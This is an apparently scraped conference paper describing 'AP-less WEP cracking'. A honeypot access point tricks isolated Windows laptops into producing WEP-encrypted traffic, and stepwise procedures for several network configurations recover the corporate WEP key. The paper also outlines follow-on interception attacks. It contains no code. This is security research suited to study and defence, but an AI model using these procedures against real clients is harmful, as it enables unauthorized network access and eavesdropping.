Burying WEP 104 Feet Under by keara

VIEWS: 19 PAGES: 9

									Cafe Latte with a Free Topping of Cracked WEP - Retrieving WEP Keys From Road-Warriors
Md Sohail Ahmad Vivek Ramachandran 1. Abstract: Our talk aims at debunking the age old myth that to crack WEP, the attacker needs to be in the RF vicinity of the authorized network, with at least one functional AP up and running. Our work will demonstrate that it is possible to retrieve the WEP key from an isolated Client (the Client can be on the Moon!) using a new technique called “AP-less WEP Cracking”. After our presentation Pen-testers will no longer need to drive up to a parking lot to crack WEP. For corporations ignorant enough to still use WEP, it would mean that their WEP keys can be cracked while one of their employees is transiting through an airport, having a cup of coffee, or is catching some sleep in a hotel room. Interestingly, our discovery also has a great impact on the way Honey-pots work today and will take them to the next level of sophistication. At its core, our attack uses various behavioral characteristics of the windows Wireless stack along with already known flaws in WEP to pull off this feat! Depending upon the network configuration of the authorized network we will show that it is possible to recover the WEP key from an isolated Client within a time slot ranging between just a few minutes to a couple of hours. During our talk we will demonstrate our technique and release a tool built on top of the open source Madiwfi-ng driver to automate these attacks. It is important to note that though our talk will centre on wireless Clients which run a windows operating system, the core idea which we are presenting can be easily used to find similar attacks for other operating systems. Before we discuss out attack, let us take a look at the behavioral characteristics and flaws we will exploit. 2. Attack Background: Let us first look at the wireless behavior of a widows Client: A. When a windows laptop successfully connects to a wireless network, it stores the network SSID into a list called the Preferred Network List (PNL). Simply put, PNL is a way to remember networks which the user has already connected to, so that windows can automatically connect to it the next time the same network is available, without user intervention. Interestingly the PNL is maintained across reboots. B. When a windows laptop connects to a WEP encrypted network, it stores the WEP key locally so that it can connect to the network later without prompting the user.

This makes the user experience seamless and more consistent when occasional disconnects happen. C. On switching on the wireless interface of a windows laptop – it will query for all network SSIDs in the Preferred Network List (PNL) and connect to any of them, if they are available in the current location. This allows an Attacker, monitoring the air, to find out the SSIDs in the PNL of the Client. D. After a successful Authentication and Association with the AP, a windows laptop configured for DHCP behaves as follows: 1) Sends a couple of DHCP discover packets (around 3+) to get an IP 2) If it receives no reply – then it assigns itself a random IP between the range of 169.254.0.0 – 169.254.255.255 (a total address space of approx. 65,000) 3) It will stay parked on this IP address and continue to send DHCP discover packets every few seconds or so to check if any DHCP server responds E. After a successful Authentication and Association with an AP, a windows laptop configured with a static IP for the wireless interface behaves as follows: 1) Sends out around 3+ Gratuitous ARP packets announcing its static IP address F. In a situation where a windows laptop connects to an Access Point and receives a De-Authentication message from the AP, it will immediately connect back to the AP. The flaws in WEP which we shall use in our attacks: A. WEP does not have mutual authentication. Only the client has to authenticate itself to the AP. The AP does not have to authenticate itself to the Client.

B. WEP is cryptographically broken and WEP cracking works by collecting either/both: 1) WEP encrypted data packets and using the Initialization Vector (IV) and first two encrypted bytes to crack the WEP key using the FMS and KoreK statistical conditions 2) WEP encrypted data packets with known plain text and then using the IV and key stream to crack the WEP key using the PTW attack. The currently implemented form of the PTW attack uses ARP packets.

3. The Attack: A WEP encrypted network will use any one of the following configurations: A. Shared Authentication 1) DHCP IP 2) Static IP B. Open Authentication 1) DHCP IP 2) Static IP In practice, case (A1) i.e. Shared Authentication with DHCP seems to be the most prevalent network configuration in wireless network deployments. We will now discuss how we can recover the WEP key for each of these network configurations with just an isolated wireless Client. The basic idea behind our attack is as follows: We will make the Client connect to our Honey-pot AP which will use the same SSID of the authorized network the Client is probing for. Once the Client is connected to our Honey-pot, we will use various techniques to make the Client generate data packets encrypted with the authorized network‟s WEP key. Once we have enough of these data packets we will be able to crack the WEP key. Our experiments have shown that for the most popular deployment i.e. Shared Authentication and DHCP configuration it is possible to crack the WEP key in around 20-24 minutes. For all other configurations it takes a couple of hours. It is important to note that the Authentication Request packet sent by the Client contains information about if the network it is trying to connect to supports Open or Shared Authentication. We can thus setup an appropriate Honey-pot setup. Also by looking at the packet size it is possible to differentiate between DHCP Discover and ARP packets. Let us now look at the different techniques we will use for various network configuration types discussed above. For simplicity we will assume that the Client has a WEP encrypted network „ABC‟ configured in its Preferred Network List (PNL). We will now discuss how to recover the WEP key of „ABC‟ from the isolated client for all the above network configurations. 3.1 Shared Authentication: Because the Shared Authentication in WEP is flawed and there is no mutual authentication in WEP, it is possible to have a WEP Client Authenticate and Associate with a Honey-pot AP, without the Honey-pot AP needing to know the WEP key itself. 3.1.1 The network ‘ABC’ has Shared Authentication with DHCP:

For this network configuration we will recover the WEP key by using the following technique: A. Monitor the air for Probe Request packets B. When we see a probe for the network „ABC‟ we will bring up a Honey-pot AP advertising the same SSID „ABC‟ C. The client will see the Honey-pot AP „ABC‟ set up by us and send an Authentication Request D. Our Honey-pot will reply back to the client with a challenge text of 128 bytes E. The client will send back a response with the encrypted challenge text using the WEP key. This packet also contains the IV used in conjunction with the WEP key to generate the key stream F. Our Honey-pot AP will XOR the challenge text and cipher text to get the corresponding key-stream G. Our Honey-pot sends an Authentication success to the client H. The Client sends us an Association Request to which our Honey-pot responds with a successful Association Response. The Client is now associated with us. I. The client now sends around 3 DHCP Discover messages all as encrypted data packets. J. Once the DHCP process times out the client assumes an IP in the range between 169.254.0.0. – 169.254.255.255 (A total of 65,535 IP addresses). This is also called the autoconfiguration IP address. K. Our Honey-pot AP will now use the 128 byte key-stream derived in step F to construct an ARP request packet for every address in the above range L. Our Honey-pot AP will construct an ARP request for 169.254.x.y coming from 169.254.x.z (from the same subnet) and encrypt it with the IV and key-stream obtained in step F. M. Because we are using a valid IV and key-stream to encrypt the ARP requests the Client will accept the packet and push it up the network stack N. The client will ignore all ARP requests except the one addressed to it. It will reply back with an ARP reply (encrypted of course) to this ARP request packet. This will help us identify which IP the client is currently using. At around 100 ARP requests per second we easily cover the entire space of 65,535 addresses in around 12-15 minutes. O. Our Honey-pot AP will thus be able to find out the IP address of the client P. Once the Honey-pot AP has found the IP address of the client, it will keep sending a large number of ARP request for that IP to the client Q. The client will reply back with ARP replies continuously and end up generating more and more WEP encrypted data packets using the Authorized network key. R. We will store these WEP encrypted data packets generated by the client The key-stream using the shared authentication flaw in F is 128 bytes and the ARP Request over wireless requires a total of 36 bytes (LLC header is 8 bytes and ARP request is 28 bytes). Thus it is possible to construct a full ARP Request packet without having to know the WEP key.

Note here that we have made the client generate ARP response packets using the authorized network WEP key without ourselves needing to know the WEP key. After collecting a large enough trace of these ARP packets, we can use a WEP cracker such as Aircrack-ptw which implements the PTW attack using ARP packets to crack the WEP key. It took us around 20-24 minutes to crack 104 bit WEP keys using this technique. 3.1.2 The network ‘ABC’ has Shared Authentication and Static IP configuration: In this configuration we will use just the Shared Authentication flaw and Gratuitous ARP packets generated to derive the WEP key, as it is impossible to know the Static IP assigned to the client. The technique works as follows: A. Monitor the air for Probe Request packets from the Client. B. When we see a probe for the network „ABC‟ we will bring up a Honey-pot AP with the same SSID „ABC‟ C. The client will see the Honey-pot network „ABC‟ and send an Authentication Request D. Our Honey-pot will reply back to the client with a challenge text of 128 bytes E. The client will send back a response with the encrypted challenge text using the WEP key and an IV. F. Our Honey-pot AP will XOR the challenge text and cipher text to get the corresponding key-stream G. Our Honey-pot sends an Authentication success to the client H. The client Associates with us now I. As the client is configured with a Static IP – it will send out around 3 gratuitous ARP requests in quick succession announcing its IP. These packets will be encrypted using the authorized network WEP key J. Our Honey-pot AP has thus managed to collect around 4 encrypted packets K. Our Honey-pot AP now sends a De-Authentication packet to the client L. The client gets disconnected and once again connect to our Honey-pot M. The cycle from C to L continues We have experimentally verified that over time the Client generates enough WEP encrypted packets for an attacker to crack the key. It took us around 6 hours to crack 104 bit WEP keys using this technique. Another interesting point to note here is that as the PTW attack in its current implementation uses an IV and 16 bytes of the keystream to try and decipher the WEP key. We can thus use the key-stream derived using the Shared authentication attack described in D,E,F in the PTW attack tools. 3.2 Open Authentication:

We will now discuss how to derive the WEP key for networks which use Open Authentication from an isolated client. 3.2.1 The network ‘ABC’ has Open Authentication and DHCP configuration: For this network configuration we will retrieve the WEP key as follows: A. Monitor the air for Probe Request packets B. When we see a probe for the network „ABC‟ we will bring up a Honey-pot AP with the same SSID „ABC‟ C. The client will see our Honey-pot network „ABC‟ and send an Authentication Request D. Our honey-pot will send back an Authentication Success message E. The client will now send us an Association Request to which we will respond back with a successful Association Response F. Once the client is Associated it will send out around 3 DHCP Discover messages encrypted with the „ABC‟ network‟s WEP key. G. As the Client receives no reply to these DHCP Discover packets it then configures itself with an autoconfiguration IP address between 169.254.0.0.-169.254.255.255 H. The Client then sends out 3 Gratuitous ARP packets announcing its IP address to the network I. All the DHCP and ARP packets are sent encrypted with the WEP key of the network „ABC‟ J. Our Honey-pot will now send a De-Authentication packet to the Client K. The Client gets Disconnected and tries to connect back to the Honey-pot L. Steps B,C ... L repeat With the above technique it is possible to get around 6 WEP encrypted packets per Association. It is important to note here as the DHCP process takes a couple of seconds to time out, it ends up slowing the data collection. We have observed that it is faster to send the De-Authentication packet as soon as we receive the very first encrypted packet (DHCP) from the Client. Though this will provide us with just 1 data packet per Association, this technique is relatively faster and breaks the WEP key in a shorter duration. Using this faster technique we were able to crack 104 bit keys in around 8-9 hours. 3.2.2 Open Authentication with Static IP configuration: We will use the following technique to crack the WEP key for this configuration: A. Monitor the air for Probe Request packets B. When we see a probe for the network „ABC‟ we will bring up our Honey-pot AP with the same SSID „ABC‟ C. The client will see our Honey-pot „ABC‟ and send an Authentication Request D. Our Honey-pot will reply back with an Authentication Success packet E. The client Associates with us now

F. After Associating, as the client is configured with a Static IP – it will send out around 3 gratuitous ARP requests in quick succession. These packets will be encrypted using the authorized network WEP key G. Our Honey-pot AP has thus managed to collect 3 encrypted ARP packets H. Our Honey-pot AP now sends a De-Authentication packet to the client I. The client gets disconnected and once again connects to our Honey-pot J. The cycle from C to I continues For every Association we will be able to collected 3 encrypted ARP packets sent using the authorized network‟s WEP key. Repeating this technique over time yields us enough packets to crack the key using the PTW attack which uses ARP packets. In our experiments it took us around 7-8 hours to crack 104 bit WEP keys. 4. Conclusion: We have demonstrated that it is possible to recover the WEP key of networks in the PNL of an isolated windows wireless client, regardless of the network configuration of the Client. The beauty of our “AP-less WEP Cracking” technique lies in the fact that the client may be on a plane, at home or any other place far away from the authorized network and still have the authorized network‟s key compromised. Depending on the Authentication and Network configuration the attacker can recover the key in a time frame ranging between a few minutes to a couple of hours. For the most widely used configuration – Shared Authentication and DHCP, we have demonstrated that we can recover the key within 20-24 minutes.

5. Once the WEP key is recovered: Once we have broken the WEP key, we could do one or more of the following: a. Bring up a Honey-pot AP with this WEP key. As we now know the WEP key it is possible to decrypt packets sent by the Client. Thus we can respond to the DHCP request of the client with a DHCP response and assign an IP address to the client. If the Client uses Static IP, then we can assign ourselves an IP address in the same range. After this we will be able to communicate with the Client at the IP layer. b. As our technique does not require the WEP cracker to be anywhere near the vicinity of the authorized wireless network, it is undetectable by Wireless Intrusion Prevention systems which may have been deployed on site. Also the current Windows wireless configuration utility does not detect/mitigate this attack, making all windows client vulnerable to this attack. 6. Repercussions for Client Mis-association and Hotspot/Honey-pot attacks:

Until now, all Client Mis-Associations and Honey-pot based attacks worked only if the network SSID being probed by the Client was Open Authentication with no WEP. This was because an Attacker without the knowledge of the WEP key would not be able to exchange any meaningful data with the Client, even if he did manage to spoof the Authentication and Association. With our attack the Attacker can first break the WEP key of the WEP encrypted network the Client is probing for and then bring up a Honey-pot AP with the same SSID and WEP key. After this he will be able to sniff/modify/exchange information with the Client and conduct all the attacks he managed to achieve against the Open Authentication case with no WEP. We envision, our discovery will take Client Mis-association and Hotspot/Honey-pot attacks to the next level.

7. Code to be released: We will release a custom Honey-pot AP built on top the open source Madwifi-ng driver. This custom AP will support all the attacks which we have discussed in this paper. 8. References
1. RC4 stream Cipher basics http://en.wikipedia.org/wiki/RC4 2. Wired Equivalent Privacy (WEP) http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy 3. Weaknesses in the Key Scheduling Algorithm of RC4, Selected Areas in Cryptography, 2001 - Fluhrer, Mantin and Shamir http://www.wisdom.weizmann.ac.il/~itsik/RC4/Papers/Rc4_ksa.ps 4. Korek’s post on Netstumbler http://www.netstumbler.org/showpost.php?p=89036 5. WEP Dead Again: Part 1 – Infocus, Securityfocus.com http://www.securityfocus.com/infocus/1814 6. WEP Dead Again: Part 2 – Infocus, Securityfocus.com http://www.securityfocus.com/infocus/1824 7. Wifi Honeypots a new hacker trap http://www.securityfocus.com/news/552 8. Does Your Wi-Fi Hotspot Have an Evil Twin? http://www.pcworld.com/article/id,120054-page,1/article.html 9. Protect your Mobile Workers from Wireless Hotspot Phishing http://www.ebcvg.com/articles.php?id=757 10. Wireless Honeypot Countermeasures http://www.securityfocus.com/infocus/1761 11. The PTW attack on WEP http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw 12. Aircrack-ptw: WEP Cracker using the PTW attack http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrackptw-1.0.0.tar.gz 13. Aircrack-ng : WEP Cracker http://www.aircrack-ng.org/ 14. Airsnort : WEP Cracker http://airsnort.shmoo.com/

15. WPA/WPA2 the replacement for WEP http://en.wikipedia.org/wiki/WPA2


								
To top